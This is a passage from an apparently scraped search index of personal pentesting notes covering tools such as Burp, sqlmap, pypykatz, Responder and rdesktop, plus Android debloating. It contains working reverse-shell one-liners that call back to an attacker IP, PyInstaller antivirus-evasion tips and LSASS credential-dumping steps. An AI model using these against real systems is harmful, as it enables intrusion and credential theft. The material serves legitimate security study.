    https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/

    ","tags":["privilege escalation","linux"]},{"location":"process-hacker-tool/","title":"Process Hacker tool","text":"","tags":["thick client application"]},{"location":"process-hacker-tool/#usage","title":"Usage","text":"

    In the course Pentesting thick clients applications.

    We will be using the portable version.

    1. Open the application you want to test.

    2. Open Process Hacker Tool.

    3. Select the application, click right on \"Properties\".

    4. Select tab \"Memory\".

    5. Click on \"Strings\".

    6. Check \"Image\" and \"Mapped\" and search!

    7. In the results you can use the Filter option to search for (in this case) \"data source\".

    Other possible searches: Decrypt. Clear text conection string in memory reveals credentials: powned!!!

    ","tags":["thick client application"]},{"location":"proxies/","title":"Proxies","text":"

    A proxy is when a device or service sits in the middle of a connection and acts as a mediator.

    • HTTP Proxies: BurpSuite
    • Postman, mitm_relay
    • SOCKS/SSH Proxy (for pivoting): Chisel, ptunnel, sshuttle.

    There are many types of proxy services, but the key ones are:

    • Dedicated Proxy/Forward Proxy: The Forward Proxy, is what most people imagine a proxy to be. A Forward Proxy is when a client makes a request to a computer, and that computer carries out the request. For example, in a corporate network, sensitive computers may not have direct access to the Internet. To access a website, they must go through a proxy (or web filter).
    • Reverse Proxy: As you may have guessed, a reverse proxy, is the reverse of a Forward Proxy. Instead of being designed to filter outgoing requests, it filters incoming ones. The most common goal with a Reverse Proxy, is to listen on an address and forward it to a closed-off network. Many organizations use CloudFlare as they have a robust network that can withstand most DDOS Attacks.
    • Transparent Proxy
    "},{"location":"proxies/#setting-up-postman-with-burpsuite","title":"Setting up Postman with BurpSuite","text":"

    1 - Postman > Settings

    2 - Proxy tab. Check:

    • Use the system proxy
    • Add a custom proxy configuration
    • HTTP
    • HTTPS
    • 127.0.0.1
    • 8080

    3 - BurpSuite. Settup proxy listener

    4 - Burp Suite. Intercept mode on

    5 - Postman. Send the interesting request from your collection

    6 - Your BurpSuite will intercept that traffic. Now you can send it to Intruder, Repeater, Sequencer...

    "},{"location":"proxies/#setting-up-mitm_relay-with-burpsuite","title":"Setting up mitm_relay with Burpsuite","text":"

    In DVTA we will configure the server to the IP of the local machine. In my lab set up my IP was 10.0.2.15.

    In FTP, we will configure the listening port to 2111. Also we will disable IP check for this lab setup to work.

    From https://github.com/jrmdev/mitm_relay:

    This is what we're doing:

    1. DVTA application sends traffic to port 21, so to intercept it we configure MITM_relay to be listening on port 21.

    2. mitm_relay encapsulates the application traffic )no matter the protocol, into HTTP protocol so BurpSuite can read it

    3. Burp Suite will read the traffic. And we can tamper here our code.

    4. mitm_relay will \"unfunnel\" the traffic from the HTPP protocol into the raw one

    5. In a lab setup FTP server will be in the same network, so to not get in conflict with mitm_relay we will modify FTP listen port to 2111. In real life this change is not necessary

    Running mitm_relay:

    python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means we all listening in all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationserver>:<listeningPortonDestinationServer>\n# -p Proxy configuration: <IPofProxy>:<portOfProxy> \n

    And this is how the interception looks like:

    "},{"location":"proxies/#burpsuite-sqlmap","title":"Burpsuite + sqlmap","text":""},{"location":"proxies/#from-burpsuite","title":"From Burpsuite","text":"

    Browse the application to capture the generating csfr request in your traffic.

    Open Settings, go to tab Session and scroll down to the section Macros.

    Click on \"Add\" (a macro.) You will see the already captured requests.

    Select the request in which the csrt is created/refreshed (and still not used) and click on OK.

    Name your macro in the window \"Macro Editor,\" for instance GET_csrf, and select \"Configure item\".

    Now you indicate to Burpsuite where the value of the CSRF is shown in the response. Don't forget to add the name of the parameter. Click on OK.

    Click on OK in the window \"Macro editor\".

    You are again in the Setting>Sessions section. Macro section is at the bottom of the page. Now we are going to configure the section \"Session handling rules\":

    Click on \"Add\" (a rule,) and the \"Session handling rule editor\" will open.

    • In Rule description write: PUT_CSRF
    • In Rule actions, click on \"Add > Run a macro.\"
    • New window will open for defining the action performed by the macro:
      • Select the macro GET_csrf.
      • Select the option \"Update only the following parameter,\" and add in there the name we used before when defining where the token was, \"csrf.\"
      • In the top menu, select the tab \"Scope,\" and add the url within scope.
      • IMPORTANT: In Tools Scope, select the module \"Proxy.\" This will allow sqlmap request to be routed.
    "},{"location":"proxies/#from-sqlmap","title":"From Sqlmap","text":"

    Create a file that contains the request that is vulnerable to SQLi and save it.

    Then:

    sqlmap -r request.txt -p id --proxy=http://localhost:8080 --current-db --flush sessions -vv \n

    Important: Flag --proxy sends the request via Burpsuite.

    For Blind injections you need to specify other parameters such as risk and level.

    "},{"location":"pyftpdlib/","title":"pyftpdlib","text":"

    A simple FTP server written in python

    ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#installation","title":"Installation","text":"
    sudo pip3 install pyftpdlib\n
    ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#basic-usage","title":"Basic usage","text":"

    By default pyftpdlib uses port 2121. With --port flag, indicate a different port. Anonymous authentication is enabled by default if we don't set a user and password.

    sudo python3 -m pyftpdlib --port 21\n

    With the option --write to allow clients to upload files to our attack host:

    sudo python3 -m pyftpdlib --port 21 --write\n
    ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyinstaller/","title":"Pyinstaller","text":"

    PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files \u2013 including the active Python interpreter! \u2013 and puts them with your script in a single folder, or optionally in a single executable file.

    ","tags":["pentesting","python"]},{"location":"pyinstaller/#installation","title":"Installation","text":"
    pip install pyinstaller\n
    ","tags":["pentesting","python"]},{"location":"pyinstaller/#usage","title":"Usage","text":"
    pyinstaller /path/to/yourscript.py\n

    But the real power of pyinstaller is when it comes to onefile script generation. Additionally, pyinstaller provides a flag to avoid consoles from opening.

    pyinstaller --onefile --windowed /path/to/yourscript.py\n

    IF\u00a0the antivirus (signature based) is able to catch the EXE even before opening it, then you need to change the packaging method as that would change the signature of the exported EXE.

    Pyinstaller uses UPX\u00a0to compress the size of the EXE output. So it's worth to try with

    pyinstaller --onefile --windowed /path/to/yourscript.py --noupx\u00a0 \u00a0\n\n# --noupx: Do not use UPX\n

    Or even other software to export into EXE.

    IF\u00a0the antivirus (heuristic based) did catch your exe after opening it, then you need to change the structure or the order of your source code:

    • Add some random delay.
    • Add some random operations like create a text file, append random text and then delete the file.
    • Change the order of doing things.
    • Offload some operations/commands to subprocess.

    Tips:

    Never blindly rely on Anti-Virus Sandbox Vmware to test an EXE.

    ","tags":["pentesting","python"]},{"location":"pypykatz/","title":"pypykatz","text":"

    Mimikatz implementation in pure Python. Runs on all OS's which support python>=3.6

    ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/skelsec/pypykatz.

    ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#basic-usage","title":"Basic usage","text":"
    pypykatz lsa minidump /home/path/lsass.dmp \n

    From results, and as an example, we will have this snip:

    sid S-1-5-21-4019466498-1700476312-3544718034-1001\nluid 1354633\n    == MSV ==\n        Username: bob\n        Domain: DESKTOP-33E7O54\n        LM: NA\n        NT: 64f12cddaa88057e06a81b54e73b949b\n        SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8\n        DPAPI: NA\n

    MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database. Pypykatz extracted the SID, Username, Domain, and even the NT & SHA1 password hashes associated with the bob user account's logon session stored in LSASS process memory.

    But also, these others:

    • WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. LSASS caches credentials used by WDIGEST in clear-text.
    • Kerberos is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.
    • DPAPI: The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:
    Applications Use of DPAPI Internet Explorer Password form auto-completion data (username and password for saved sites). Google Chrome Password form auto-completion data (username and password for saved sites). Outlook Passwords for email accounts. Remote Desktop Connection Saved credentials for connections to remote machines. Credential Manager Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

    Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.

    ","tags":["windows","dump hashes","passwords"]},{"location":"rdesktop/","title":"rdesktop","text":"

    rdesktop is an open source UNIX client for connecting to Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop.

    ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#installation","title":"Installation","text":"

    Preinstalled in Kali.

    sudo apt-get install rdesktop\n
    ","tags":["tools","windows","rdp"]},{"location":"rdesktop/#basic-usage","title":"Basic usage","text":"
    rdesktop $ip\n\n# Mounting a Linux Folder Using rdesktop\nrdesktop $ip -d <domain> -u <username> -p <'Password0@'> -r disk:linux='/home/user/rdesktop/files'\n
    ","tags":["tools","windows","rdp"]},{"location":"regex/","title":"Mastering Regular Expressions - Regex","text":"

    The implementation system of regex functionality is often called \"regular expression engine\". Basically a regex engine tries to match the pattern to the given string. There are two main types of regex engines: DFA and NFA, also referred to as text-directed and regex-directed engines.

    h you can build complex patterns that can match a wide range of combinations.

    Metacharacter Description . Any single character ^ Match the beginning of a line $ Match the end of a line a|b Match either a or b \\d any digit \\D Any non-digit character \\w Any word character \\W Any non-word character \\s matches any whitespace character \\S Match any non-whitespace character \\b Matches a word boundary \\B Match must not occur on a\u00a0\\b\u00a0boundary. [\\b] Backspace character \\xYY Match hex character YY \\ddd Octal character ddd [] Start/close a charaters class () Start/close a characters group \\ Escape special characters | It means OR {} Start/close repetitions of a characters class

    Quantifiers

    Regex Quantifier Description + + indicates that the previous character must occur at least one or more times. ? ? indicates that the preceding character is optional. It means the preceding character can occur zero or one time. * Matches zero or more of the preceding character. {n} Matches exactly n occurrences of the preceding character. {n,} Matches n or more occurrences of the preceding character. {n,m} Matches between n and m occurrences of the preceding element

    The followings are common examples of character classes:

    • [abc] - matches any one character that is either 'a', 'b', or 'c'.
    • [a-z] - matches any one lowercase letter from 'a' to 'z'.
    • [A-Z] - matches any one upper case letter from 'A' to 'Z'.
    • [0-9] - matches any one digit from '0' to '9'. Optionaly, use \\d metacharacter.
    • [^abc] - matches any one character that is not 'a', 'b', or 'c'.
    • [\\w] - matches any one-word character, including letters, digits, and underscore.
    • [\\s] - matches any whitespace character, including space, tab, and newline.
    • [^a-z] - matches any one character that is not a lowercase letter from 'a' to 'z'.

    In regex, any subpattern enclosed within the parentheses () is considered a group. For example,\u00a0(xyz)\u00a0creates a group that matches the exact sequence \"xyz\".

    Non-printing character Description \\0 NULL Byte. In many programming language marks the end of a string \\b Within a character class represent the backspace character, while outside \\b matches a word boundary \\t Tab key. \\n New line \\v Vertical tabulation \\f Form feed \\r In HTTP the \\r\\n sequence is used as the end-of-line marker \\e Escape character"},{"location":"regex/#unicode","title":"Unicode","text":"

    Regular expression flavors that work with Unicode use specific meta-sequences to match code points:

    # `\\u`+code-point \n\ncode-point is the hexadecimal number of the character to match \n`\\u2603`\n\n# `\\x`{code-point} in the PCRE library in Apache and PHP\n{code-point} is the hexadecimal number of the character to match \n`\\x{2603}`\n
    "},{"location":"regshot/","title":"regshot","text":"

    regshot helps you to identify changes in Registry made by a Thick client application. It's used to compare the amount of registry entries that have been changed during an installation or a change in your system settings.

    "},{"location":"regshot/#installation","title":"Installation","text":"

    Download from: https://sourceforge.net/projects/regshot/

    "},{"location":"regshot/#usage","title":"Usage","text":"

    From the course Pentesting thick clients applications.

    1. Run regshot version according to your thick-app (84 or 64 v).

    2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

    3. Open the app you want to test and login into it.

    4. Perform some kind of action, like for instance, viewing the profile.

    5. Take a \"Second shot\" of the Registry entries.

    6. After that, you will see the button \"Compare\" enabled. Click on it.

    An HTML file will be generated and you will see the registry entries:

    An interesting registry is \"isLoggedIn\", that has change from false to true. This may be a potential vector of attack (we could set it to true and also change username to admin).

    HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

    "},{"location":"remove-bloatware/","title":"Remove bloatware from android phones","text":"

    Android Debug Bridge - adb cheat sheet.

    First of all, make sure you have enabled Developer mode in your mobile. Afterward, enable \"USB Debug mode\" (Depuraci\u00f3n USB in spanish).

    1. Connect mobile to computer with USB cable.

    2. Press \"File Transfer\" in mobile.

    3. In laptop, open a terminal and run:

    # Check if device is connected. \nadb devices\n

    4. If device is well connected, mobile will be prompted to accept the computer connection.

    5. Access the device from terminal:

    adb shell\n

    Now you can uninstall packages.

    "},{"location":"remove-bloatware/#basic-commands","title":"Basic commands","text":"
    # Uninstall app\npm uninstall --user 0 app.package.name\n\n# Deactivate app\npm disable-user app.package.name\n
    "},{"location":"remove-bloatware/#list-of-xiaomi-trash","title":"List of xiaomi trash","text":"
    • com.miui.analytics: analytic de anal\u00edtica de Xiaomi.
    • com.xiaomi.mipicks: apps store. Occasionaly it displays adds.
    • com.miui.msa.global: servicio de anuncios y publicidad de MIUI.
    • com.miui.cloudservice | com.miui.cloudservice.sysbase | com.miui.newmidrive: herramientas de Mi Cloud.
    • com.miui.cloudbackup: herramienta de copia de seguridad en la nube Mi Cloud Backup.
    • com.miui.backup: herramienta de copias de seguridad de MIUI.
    • com.xiaomi.glgm: herramienta de juegos de Xiaomi.
    • comn.xiaomi.payment | com.mipay.wallet.in:\u00a0herramientas de pagos m\u00f3viles de Xiaomi.
    • com.tencent.soter.soterserver: funci\u00f3n de pagos m\u00f3viles a trav\u00e9s de WeChat y otros servicios populares en China.
    • cn.wps.xiaomi.abroad.lite: Mi DocViewer, herramienta de visualizaci\u00f3n de documentos PDF.
    • com.miui.videoplayer: reproductor Mi Video.
    • com.miui.player: reproductor Mi Music.
    • com.mi.globalbrowser: navegador Mi Browser.
    • com.mi.midrop: herramienta ShareMe para compartir archivos con otros dispositivos Xiaomi.
    • com.miui.yellowpage: Mi YellowPages, sistema de protecci\u00f3n anti-spam telef\u00f3nico.
    • com.miui.android.fashiongallery: carrusel de fondos de pantalla.
    • com.miui.bugreport | com.miui.miservice: herramientas para reportar fallos de MIUI.
    • com.miui.weathe2: app del tiempo de Xiaomi.
    • com.xiaomi.joyose: herramientas de anal\u00edtica y publicidad.
    • com.zhiliaoapp.musically: TikTok
    • com.facebook.katana: app de Facebook.
    • com.facebook.services: servicios de Facebook.
    • com.facebook.system:\u00a0instalador de apps de Facebook.
    • com.facebook.appmanager: gestor de aplicaciones de Facebook.
    • com.ebay.mobile | com.ebay.carrier: app de eBay
    • com.alibaba.aliexpresshd: app de AliExpress.

    More suggestion to remove bloatware from this repo: xiaomi_debloat.sh

    pm uninstall --user 0 com.android.inputmethod.latin\npm uninstall --user 0 com.android.camera2\npm uninstall --user 0 com.android.providers.partnerbookmarks\npm uninstall --user 0 com.android.emergency\npm uninstall --user 0 com.android.printspooler\npm uninstall --user 0 com.android.apps.tag\npm uninstall --user 0 com.android.dreams.basic\npm uninstall --user 0 com.android.dreams.phototable\npm uninstall --user 0 com.android.magicsmoke\npm uninstall --user 0 com.android.managedprovisioning\npm uninstall --user 0 com.android.noisefield\npm uninstall --user 0 com.android.phasebeam\npm uninstall --user 0 com.android.wallpaper.holospiral\npm uninstall --user 0 com.android.stk\npm uninstall --user 0 com.android.bluetoothmidiservice\npm uninstall --user 0 com.android.browser\npm uninstall --user 0 com.android.cellbroadcastreciever\npm uninstall --user 0 com.android.hotwordenrollment.okgoogle\npm uninstall --user 0 com.android.printservice.recommendation\npm uninstall --user 0 com.android.quicksearchbox\npm uninstall --user 0 com.android.email\npm uninstall --user 0 com.android.bips\npm uninstall --user 0 com.android.hotwordenrollment.xgoogle\npm uninstall --user 0 com.android.chrome\npm uninstall --user 0 com.android.webview\npm uninstall --user 0 com.android.calendar\npm uninstall --user 0 com.android.providers.calendar\npm uninstall --user 0 android.romstats\npm uninstall --user 0 com.android.documentsui\npm uninstall --user 0 com.android.globalFileexplorer\npm uninstall --user 0 com.android.midrive\npm uninstall --user 0 com.android.calculator2\npm uninstall --user 0 com.android.soundrecorder\npm uninstall --user 0 com.android.musicfx\npm uninstall --user 0 com.android.bookmarkprovider\npm uninstall --user 0 com.android.gallery3d\npm uninstall --user 0 com.android.calllogbackup\npm uninstall --user 0 com.android.traceur\npm uninstall --user 0 com.sec.android.AutoPreconfig\npm uninstall --user 0 com.sec.android.service.health\n\n\n# Google apps:\npm uninstall --user 0 com.google.android.tts\npm uninstall --user 0 com.google.android.apps.googleassistant\npm uninstall --user 0 com.google.android.apps.setupwizard.searchselector\npm uninstall --user 0 com.google.android.pixel.setupwizard\npm uninstall --user 0 com.google.android.gm\npm uninstall --user 0 com.google.android.calendar\npm uninstall --user 0 com.google.android.calculator\npm uninstall --user 0 com.google.android.apps.recorder\npm uninstall --user 0 com.google.android.printservice.recommendation\npm uninstall --user 0 com.google.android.apps.books\npm uninstall --user 0 com.google.android.apps.cloudprint\npm uninstall --user 0 com.google.android.apps.currents\npm uninstall --user 0 com.google.android.apps.fitness\npm uninstall --user 0 com.google.android.apps.photos\npm uninstall --user 0 com.google.android.apps.plus\npm uninstall --user 0 com.google.android.apps.tachyon\npm uninstall --user 0 com.google.android.music\npm uninstall --user 0 com.google.android.apps.wellbeing\npm uninstall --user 0 com.google.android.email\npm uninstall --user 0 com.google.android.googlequicksearchbox\npm uninstall --user 0 com.google.android.talk\npm uninstall --user 0 com.google.android.syncadapters.contacts\npm uninstall --user 0 com.google.android.videos\npm uninstall --user 0 com.google.tango.measure\npm uninstall --user 0 com.google.android.youtube\npm uninstall --user 0 com.google.android.apps.docs\npm uninstall --user 0 com.google.ar.lens\npm uninstall --user 0 com.google.android.apps.restore\npm uninstall --user 0 com.google.android.soundpicker\npm uninstall --user 0 com.google.android.syncadapters.calendar\npm uninstall --user 0 com.google.ar.core\npm uninstall --user 0 com.google.android.setupwizard\npm uninstall --user 0 com.google.android.apps.wallpaper\npm uninstall --user 0 com.google.android.projection.gearhead\npm uninstall --user 0 com.google.android.marvin.talkback\npm uninstall --user 0 com.google.android.inputmethod.latin\n\n\n#Xiaomi/MIUI/Baidu stuff:\n\npm uninstall --user 0 com.mi.health\npm uninstall --user 0 com.miui.zman\npm uninstall --user 0 com.miui.freeform\npm uninstall --user 0 com.miui.miwallpaper.earth\npm uninstall --user 0 com.miui.miwallpaper.mars\npm uninstall --user 0 com.miui.newmidrive\npm uninstall --user 0 cn.wps.xiaomi.abroad.lite\npm uninstall --user 0 com.miui.miservice\npm uninstall --user 0 com.xiaomi.mi_connect_service\npm uninstall --user 0 com.xiaomi.miplay_client\npm uninstall --user 0 com.miui.mishare.connectivity\npm uninstall --user 0 com.miui.huanji\npm uninstall --user 0 com.miui.misound\npm uninstall --user 0 com.xiaomi.mirecycle\npm uninstall --user 0 com.miui.cloudbackup\npm uninstall --user 0 com.miui.backup\npm uninstall --user 0 com.mfashiongallery.emag\npm uninstall --user 0 com.miui.accessibility\npm uninstall --user 0 com.xiaomi.account\npm uninstall --user 0 com.xiaomi.xmsf\npm uninstall --user 0 com.xiaomi.simactivate.service\npm uninstall --user 0 com.miui.daemon\npm uninstall --user 0 com.miui.cloudservice.sysbase\npm uninstall --user 0 com.mi.webkit.core\npm uninstall --user 0 com.sohu.inputmethod.sogou.xiaomi\npm uninstall --user 0 com.miui.notes\npm uninstall --user 0 com.bsp.catchlog\npm uninstall --user 0 com.miui.vsimcore\npm uninstall --user 0 com.xiaomi.scanner\npm uninstall --user 0 com.miui.greenguard\npm uninstall --user 0 com.miui.android.fashiongallery\npm uninstall --user 0 com.miui.cloudservice\npm uninstall --user 0 com.miui.micloudsync\npm uninstall --user 0 com.miui.enbbs\npm uninstall --user 0 com.mi.android.globalpersonalassistant\npm uninstall --user 0 com.mi.globalTrendNews\npm uninstall --user 0 com.milink.service\npm uninstall --user 0 com.mipay.wallet.id\npm uninstall --user 0 com.mipay.wallet.in\npm uninstall --user 0 com.miui.analytics\npm uninstall --user 0 com.miui.bugreport\npm uninstall --user 0 com.miui.cleanmaster\npm uninstall --user 0 com.miui.hybrid.accessory\npm uninstall --user 0 com.miui.miwallpaper\npm uninstall --user 0 com.miui.msa.global\npm uninstall --user 0 com.miui.touchassistant\npm uninstall --user 0 com.miui.translation.kingsoft\npm uninstall --user 0 com.miui.translation.xmcloud\npm uninstall --user 0 com.miui.translation.youdao\npm uninstall --user 0 com.miui.translationservice\npm uninstall --user 0 com.miui.userguide\npm uninstall --user 0 com.miui.virtualsim\npm uninstall --user 0 com.miui.yellowpage\npm uninstall --user 0 com.miui.videoplayer\npm uninstall --user 0 com.miui.weather2\npm uninstall --user 0 com.miui.player\npm uninstall --user 0 com.miui.screenrecorder\npm uninstall --user 0 com.miui.providers.weather\npm uninstall --user 0 com.miui.compass\npm uninstall --user 0 com.miui.calculator\npm uninstall --user 0 com.xiaomi.vipaccount\npm uninstall --user 0 com.xiaomi.channel\npm uninstall --user 0 com.mipay.wallet\npm uninstall --user 0 com.xiaomi.pass\npm uninstall --user 0 com.xiaomi.shop\npm uninstall --user 0 com.xiaomi.joyose\npm uninstall --user 0 com.xiaomi.providers.appindex\npm uninstall --user 0 com.miui.fm\npm uninstall --user 0 com.mi.liveassistant\npm uninstall --user 0 com.xiaomi.gamecenter.sdk.service\npm uninstall --user 0 com.xiaomi.payment\npm uninstall --user 0 com.baidu.input_mi\npm uninstall --user 0 com.xiaomi.ab\npm uninstall --user 0 com.xiaomi.jr\npm uninstall --user 0 com.baidu.duersdk.opensdk\npm uninstall --user 0 com.miui.hybrid\npm uninstall --user 0 com.baidu.searchbox\npm uninstall --user 0 com.xiaomi.glgm\npm uninstall --user 0 com.xiaomi.midrop\npm uninstall --user 0 com.xiaomi.mipicks\npm uninstall --user 0 com.miui.personalassistant\npm uninstall --user 0 com.miui.audioeffect\npm uninstall --user 0 com.miui.cit\npm uninstall --user 0 com.miui.qr\npm uninstall --user 0 com.miui.nextpay\npm uninstall --user 0 com.xiaomi.o2o\n\n\n#Xiaomi.eu:\npm uninstall --user 0 pl.zdunex25.updater\n\n\n#RevolutionOS: (not well tested)\npm uninstall --user 0 ros.ota.updater\n\n#SyberiaOS: (not well tested)\npm uninstall --user 0 com.syberia.ota\npm uninstall --user 0 com.syberia.SyberiaPapers\n\n\n#LineageOS: (not well tested)\npm uninstall --user 0 org.lineageos.recorder\npm uninstall --user 0 org.lineageos.snap\n\n\n#Paranoid Android:\npm uninstall --user 0 com.hampusolsson.abstruct\npm uninstall --user 0 code.name.monkey.retromusic\n\n#Other stuff:\npm uninstall --user 0 com.autonavi.minimap\npm uninstall --user 0 com.caf.fmradio\npm uninstall --user 0 com.opera.preinstall\npm uninstall --user 0 com.qualcomm.qti.perfdump\npm uninstall --user 0 com.duokan.phone.remotecontroller\npm uninstall --user 0 com.samsung.aasaservice\npm uninstall --user 0 org.simalliance.openmobileapi.service\npm uninstall --user 0 com.duokan.phone.remotecontroller.peel.plugin\npm uninstall --user 0 com.facemoji.lite.xiaomi\npm uninstall --user 0 com.facebook.appmanager\npm uninstall --user 0 com.facebook.katana\npm uninstall --user 0 com.facebook.services\npm uninstall --user 0 com.facebook.system\npm uninstall --user 0 com.netflix.partner.activation\n\n\n# !EXPERIMENTAL STUFF!\n\n\n#GPS & Location debloat\n#Uninstalling these may break apps like Waze.\n#You have been warned.\npm uninstall --user 0 com.android.location.fused\npm uninstall --user 0 org.codeaurora.gps.gpslogsave\npm uninstall --user 0 com.google.android.gms.location.history\npm uninstall --user 0 com.qualcomm.location\npm uninstall --user 0 com.xiaomi.bsp.gps.nps\npm uninstall --user 0 com.xiaomi.location.fused\n\n\n#Use this if you don't like the stock MIUI launcher.\n#Uninstalling this without basic setup and an alternative launcher will make the device unstable or softbricked.\n#You can't downgrade to a lower version of MIUI launcher after uninstalling this.\n#You have been warned.\npm uninstall --user 0 com.miui.home\n\n\n#Always-on Display removal\n#Not recommended, and not well-tested in daily usage\n#You have been warned.\npm uninstall --user 0 com.miui.aod\n
    "},{"location":"responder/","title":"Responder.py - A SMB server to listen to NTLM hashes","text":"

    Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

    Responder can do many different kinds of attacks. For instance we may set up a malicious SMB server. When the target machine attempts to perform the NTLM authentication to that server, Responder sends a challenge back for the server to encrypt with the user's password. When the server responds, Responder will use the challenge and the encrypted response to generate the NetNTLMv2. While we can't reverse the NetNTLMv2, we can try many different common passwords to see if any generate the same challenge-response, and if we find one, we know that is the password. We can use John The Ripper.

    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#installation","title":"Installation","text":"
    git clone https://github.com/lgandx/Responder.git\ncd Responder \nsudo pip install -r requirements.txt\n
    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#basic-usage","title":"Basic usage","text":"
    ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

    All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

    Note:\u00a0If you notice multiples hashes for one account this is because NTLMv2 utilizes both a client-side and server-side challenge that is randomized for each interaction. This makes it so the resulting hashes that are sent are salted with a randomized string of numbers. This is why the hashes don't match but still represent the same password.

    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"responder/#practical-example","title":"Practical example","text":"

    HackTheBox machine: Responder.

    ","tags":["tools","cheat sheet","python","windows","active directory","ldap","server"]},{"location":"reverse-shells/","title":"Reverse shells","text":"Resources to generate reverse shells
    • https://www.revshells.com/
    • Netcat for windows 32/64 bit
    • Pentesmonkey
    • PayloadsAllTheThings
    Other resources

    See web shells

    All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

    Victim's machine Initiates a connection back to a \"listener\" on our attacking machine box.

    For this attack to work, first we set the listener in the attacking machine using netcat.

    nc -lnvp 1234\n

    After that, on the victim's machine, you can launch the reverse shell connection.

    A Reverse Shell is handy when we want to get a quick, reliable connection to our compromised host. However, a Reverse Shell can be very fragile. Once the reverse shell command is stopped, or if we lose our connection for any reason, we would have to use the initial exploit to execute the reverse shell command again to regain our access.

    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#reverse-shell-connections","title":"Reverse shell connections","text":"","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#python","title":"python","text":"
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#bash","title":"bash","text":"
    bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'\n
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f\n\n# rm /tmp/f;\n# Removes the /tmp/f file if it exists, -f causes rm to ignore nonexistent files. The semi-colon (;) is used to execute the command sequentially.\n\n# mkfifo /tmp/f;\n# Makes a FIFO named pipe file at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (;) is used to execute the command sequentially.\n\n# cat /tmp/f |\n# Concatenates the FIFO named pipe file /tmp/f, the pipe (|) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (|).\n\n# /bin/sh -i 2>&1 |\n# Specifies the command language interpreter using the -i option to ensure the shell is interactive. 2>&1 ensures the standard error data stream (2) & standard output data stream (1) are redirected to the command following the pipe (|).\n\n# nc $ip <port> >/tmp/f\n# Uses Netcat to send a connection to our attack host $ip listening on port <port>. The output will be redirected (>) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#powershell","title":"powershell","text":"
